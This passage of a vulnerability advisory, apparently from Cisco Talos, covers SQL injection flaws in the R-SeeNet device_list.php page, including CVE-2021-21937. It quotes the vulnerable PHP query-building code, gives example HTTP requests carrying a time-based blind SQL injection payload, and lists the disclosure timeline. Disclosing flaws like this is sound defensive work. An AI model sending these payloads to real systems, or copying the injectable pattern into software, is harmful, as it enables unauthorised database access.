800       $sql = $sql.'AND health_alt = "'.mysqli_real_escape_string($link,$_SESSION['health_alt_filter']).'" ';
801     }
802     else
803     { // v pripade, ze filter = 3 hledame routry s priznakem new
804       $sql = $sql.'AND new = "1" ';
805     }
806   }
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a&loc_filter=a&prod_filter=a&stat_filter=1&firm_filter=a&sn_filter=a&mac_filter=a&name_filter=1&esn_filter=a&imei_filter=a&host_alt_filter="%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

CVE-2021-21937 - ‘host_alt_filter’ parameter

Parameter host_alt_filter is set as a session variable on line 224 of device_list.php as seen below:

222   if(isset($_GET['host_alt_filter']))
223   { // je nastaven filtr hostname alt
224     $_SESSION['host_alt_filter'] = urldecode($_GET['host_alt_filter']);
225   }

Following the above code, a variable is used on line 579 in the following code to build up a SQL query which will get executed on line 869:

577   if((isset($_SESSION['host_alt_filter'])) && ($_SESSION['host_alt_filter'] != ''))
578   {
579     $sql = $sql.'AND hostname_alt LIKE "%'.mysqli_real_escape_string($link,$_SESSION['host_alt_filter']).'%" ';
580   }
581
[...]
854   $sql = $sql.'LIMIT '. (($set - 1) * $_SESSION['count_on_page']).','.$_SESSION['count_on_page'];
855 
856   if( is_superadmin() && ($company_id == 0) )
857   { // prihlaseny superadmin, ktery nema vybranou konkretni firmu uvidi vse
858     $sql = 'call sp_GetDevicesAll(\''.$sql.'\')';
859   }
860   else if( is_admin() )
861   {
862     $sql = 'call sp_GetDevicesCompany(\''.$sql.'\',\''.get_company_id().'\')';
863   }
864   else
865   {
866     $sql = 'call sp_GetDevicesUser(\''.$sql.'\',\''.get_user_id().'\')';
867   }
868   // vykonani SQL prikazu
869     $result = db_multi_query($link, $sql);

Example exploitation could be constructed as follows:

GET /r-seenet/index.php?page=device_list&host_filter=a&health_filter=a&desc_filter=a&loc_filter=a&prod_filter=a&stat_filter=1&firm_filter=a&sn_filter=a&mac_filter=a&name_filter=1&esn_filter=a&imei_filter=a&host_alt_filter="%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362
Connection: Keep-Alive
Cookie: PHPSESSID=[SESSION ID]
Content-Length: 0
Host: [IP]

Timeline

2021-08-19 - Vendor Disclosure
2021-11-16 - Vendor Patched

2021-11-22 - Public Release

Discovered by Yuri Kramarz of Cisco Talos.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907